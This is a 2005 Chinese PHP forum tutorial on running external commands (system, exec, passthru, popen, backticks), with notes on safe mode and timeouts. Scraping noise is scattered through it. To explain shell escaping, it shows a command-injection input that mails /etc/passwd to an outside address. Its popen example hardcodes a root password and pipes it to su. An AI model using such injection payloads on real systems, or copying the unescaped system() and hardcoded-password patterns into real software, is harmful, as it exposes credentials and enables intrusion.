|
作者:Fluke 中文PHP论坛 ' p9 b3 _0 C1 @0 [6 J! y- _: |! T
PHP作为一种服务器端的脚本语言,象编写简单,或者是复杂的动态网页这样的任务,它完全能够胜任。但事情不总是如此,有时为了实现某个功能,必须借助于操作系统的外部程序(或者称之为命令),这样可以做到事半功倍。 . {: X* _9 v# L1 K0 [$ j- [
那么,是否可以在PHP脚本中调用外部命令呢?如果能,如何去做呢?有些什么方面的顾虑呢?相信你看了本文后,肯定能够回答这些问题了。
( Q) h: v8 u5 u' r 是否可以? 4 _% \' r& F# C- l1 O& s8 |2 {
答案是肯定的。PHP和其它的程序设计语言一样,完全可以在程序内调用外部命令,并且是很简单的:只要用一个或几个函数即可。 * m: M' o p" u8 S
前提条件 ! y- C# S* c* X. r
由于PHP基本是用于WEB程序开发的,所以安全性成了人们考虑的一个重要方面。于是PHP的设计者们给PHP加了一个门:安全模式。如果运行在安全模式下,那么PHP脚本中将受到如下四个方面的限制:
3 a, o5 j. p' j8 a8 q7 E 执行外部命令
! E0 P8 T2 `( F6 t4 H 在打开文件时有些限制 . R" h5 l. I ?6 J4 q- c8 j
连接MySQL数据库 " [& |" x7 `$ \! u# X9 a9 M
基于HTTP的认证
2 H S9 T0 _ R0 z 在安全模式下,只有在特定目录中的外部程序才可以被执行,对其它程序的调用将被拒绝。这个目录可以在php.ini文件中用safe_mode_exec_dir指令,或在编译PHP是加上--with-exec-dir选项来指定,默认是/usr/local/php/bin。 ; ~( ^- h U" T; o: u0 C
如果你调用一个应该可以输出结果的外部命令(意思是PHP脚本没有错误),得到的却是一片空白,那么很可能你的网管已经把PHP运行在安全模式下了。
1 r* k- o* Q2 r 如何做?
2 v. V- m, c; I) U X 在PHP中调用外部命令,可以用如下三种方法来实现: ' L8 `8 v- w+ W
1) 用PHP提供的专门函数 # j; L. _* C& Y- w. G
PHP提供共了3个专门的执行外部命令的函数:system(),exec(),passthru()。
4 X& _) l2 c3 X system()
% A; o5 Z; N5 ~ 原型:string system (string command [, int return_var])
( X5 f' z t# Y system()函数很其它语言中的差不多,它执行给定的命令,输出和返回结果。第二个参数是可选的,用来得到命令执行后的状态码。
5 x$ |# U, r7 f# _' p4 u 例子: ( @0 A' N& V7 e. Z0 E) a
<?
4 K$ ^ Z5 Q! @% Z0 S2 ~# A system("/usr/local/bin/webalizer/webalizer"); 6 U; K! B7 B1 @, Y! G5 |
?> 7 E! Q, @ m6 U+ ]
exec() 0 F3 K/ w7 i8 d" O9 F
原型:string exec (string command [, string array [, int return_var]])
2 x0 O0 E8 Y' p$ _) r' @: a. o) y" L; \; o exec()函数与system()类似,也执行给定的命令,但不输出结果,而是返回结果的最后一行。虽然它只返回命令结果的最后一行,但用第二个参数array可以得到完整的结果,方法是把结果逐行追加到array的结尾处。所以如果array不是空的,在调用之前最好用unset()最它清掉。只有指定了第二个参数时,才可以用第三个参数,用来取得命令执行的状态码。 1 x: v6 U, z, \0 e" c+ @; E" D3 T
例子:
# L9 K/ z: t8 c% N. S. t* a <?
$ f# R1 p. L/ Q# l7 R3 ^ exec("/bin/ls -l");
6 \3 L- O; b5 j, q exec("/bin/ls -l", $res); - N( x* V$ X+ q6 R% E8 Q
#$res是一个数据,每个元素代表结果的一行
& W) L; y- L& _- w exec("/bin/ls -l", $res, $rc);
7 \- R( @* j. k3 w5 i2 P #$rc的值是命令/bin/ls -l的状态码。成功的情况下通常是0
; }6 f- d$ l8 ?5 f# h$ ]6 {2 i ?> + z, S( v) W9 K% L4 G
passthru() / j/ g) L# P8 R6 Y$ J z, \$ {
原型:void passthru (string command [, int return_var]) $ n9 P# b6 h8 g- c! X" E
passthru()只调用命令,不返回任何结果,但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmplus(Unix下的一个处理图片的工具,输出二进制的原始图片的流)这样的程序。同样它也可以得到命令执行的状态码。 ! t" F7 b0 m; y/ f5 H0 `* g
例子: 8 m* P+ N7 q; g; i
<?
; P' @/ [* s+ e' G/ V5 I header("Content-type: image/gif"); 1 J0 [. Q2 M+ D/ b& u* \
passthru("./ppmtogif hunte.ppm"); 8 P; K: n# k& P% r: G0 ?' D! b
?>
9 S R, B. Z8 r7 |' u4 _ 2) 用popen()函数打开进程 * n5 s' s _: X3 F
上面的方法只能简单地执行命令,却不能与命令交互。但有些时候必须向命令输入一些东西,如在增加Linux的系统用户时,要调用su来把当前用户换到root才行,而su命令必须要在命令行上输入root的密码。这种情况下,用上面提到的方法显然是不行的。 ; F8 q" d5 p, G+ z
popen()函数打开一个进程管道来执行给定的命令,返回一个文件句柄。既然返回的是一个文件句柄,那么就可以对它读和写了。在PHP3中,对这种句柄只能做单一的操作模式,要么写,要么读;从PHP4开始,可以同时读和写了。除非这个句柄是以一种模式(读或写)打开的,否则必须调用pclose()函数来关闭它。
, n0 z5 @4 R/ j9 E) a 例子1:
, l+ L, a- u* J <?
) k5 b; t: L# A $fp=popen("/bin/ls -l", "r");
% y; k3 \# J. \! n3 s# F ?> . ^$ ?/ k6 F+ I& v7 n; w+ P6 i
例子2(本例来自PHP中国联盟网站http://www.phpx.com/show.php?d=col&i=51):
7 B; ] |) ]1 X <? 0 n, ~; `% \2 E, Y2 Z* f! G
/* PHP中如何增加一个系统用户 : e" W v. Z4 M* ~( q
下面是一段例程,增加一个名字为james的用户, * \; ^9 I6 @% R' H9 Q4 Q
root密码是 verygood。仅供参考 6 E9 N9 n$ }* A# _ o# x
*/
! \$ D1 z# m: J% x1 t& D; N9 x $sucommand = "su --login root --command"; / ?( h& e. f7 T; }
$useradd = "useradd ";
$ J8 s2 I, p! l2 C $rootpasswd = "verygood"; " D3 L% |3 B6 P
$user = "james"; 9 V+ U: V4 N C& p' L* X
$user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);
' u. [4 v# l$ }1 ?3 q $fp = @popen($user_add,"w");
& p4 F! k# M) n4 W @fputs($fp,$rootpasswd); 9 H( z h9 L7 s; x3 c& k) G4 C& R
@pclose($fp);
0 P4 }0 V7 R' L ?> * u. Y7 @- O0 {, S X/ G0 o p( T
3) 用反撇号(`,也就是键盘上ESC键下面的那个,和~在同一个上面) + d5 N2 A( |4 g7 x3 e
这个方法以前没有归入PHP的文档,是作为一个秘技存在的。方法很简单,用两个反撇号把要执行的命令括起来作为一个表达式,这个表达式的值就是命令执行的结果。如:
# V$ M# m! ~, N" l, C) W <?
" V- w0 z" u& M, R) E+ i% K $res=`/bin/ls -l`;
a* K z; S! T! T% l# c echo '<b><pre>'.$res.'</pre></b>'; # j4 {- A/ [# w, E# j+ Y$ ]7 \; Q- r
?> J4 g7 Q2 J1 X! s1 L+ b
这个脚本的输出就象:
8 ^8 _2 F2 z% e3 P8 U hunte.gif
$ S! n* Y5 S. A1 B2 ~ hunte.ppm 5 O4 b; Y3 g( r
jpg.htm * M8 X' R% Y; x5 P$ N
jpg.jpg
1 I2 T$ ^4 @) [7 Y* ?7 \+ Y+ T! e3 w passthru.php
8 C# e' {5 B6 R) I- I! C 要考虑些什么? 9 m n5 F7 M* g. p6 }$ v
要考虑两个问题:安全性和超时。 / q6 |! U. _ e
先看安全性。比如,你有一家小型的网上商店,所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件,让你的用户输入他们的EMAIL地址,然后把这个产品列表发给他们。假设你没有使用PHP的mail()函数(或者从未听说过),你就调用Linux/Unix系统的mail程序来发送这个文件。程序就象这样:
) d. B0 X4 I+ B% ? <?
7 J5 C! W! ^# x# C( V9 s6 M" Y system("mail $to < products.txt"); ( G6 U$ ^5 X# p6 ?+ P
echo "我们的产品目录已经发送到你的信箱:$to"; 4 H( H& Y3 [# C f8 E, B+ L& c$ @7 ^2 ?
?> # U0 L; I" Y$ X( Y5 m3 J
用这段代码,一般的用户不会产生什么危险,但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址: / T! W6 B4 q# D$ l5 ?3 V2 s
'--bla ; mail someone@domain.com < /etc/passwd ;' 2 }6 ]9 v& [* f3 a* D) N, D: g
那么这条命令最终变成: 8 J2 l1 F7 g* z
'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt' $ I3 e3 i( m# \ o5 e
我相信,无论哪个网络管理人员见到这样的命令,都会吓出一身冷汗来。
/ @& X4 _0 K2 P' a# A; W& m 幸好,PHP为我们提供了两个函数:EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的,象分号(),重定向(>)和从文件读入(<)等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串就可以安全地作为命令的参数。
3 l: @# `7 h U' s# L- t; L/ Q0 | 再来看看超时问题。如果要执行的命令要花费很长的时间,那么应该把这个命令放到系统的后台去运行。但在默认情况下,象system()等函数要等到这个命令运行完才返回(实际上是要等命令的输出结果),这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外一个文件或流中,如:
* Z$ W, Q' d) E: Z# {. g* P3 K <?* l+ B, E. J- x6 a' ?
system("/usr/local/bin/order_proc > /tmp/null &");+ U" |0 X! q7 K+ j5 {- k
?>; m' d" v! h$ Z0 P$ q4 u
| 
IP卡
狗仔卡
发表于 2005-1-16 11:34
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
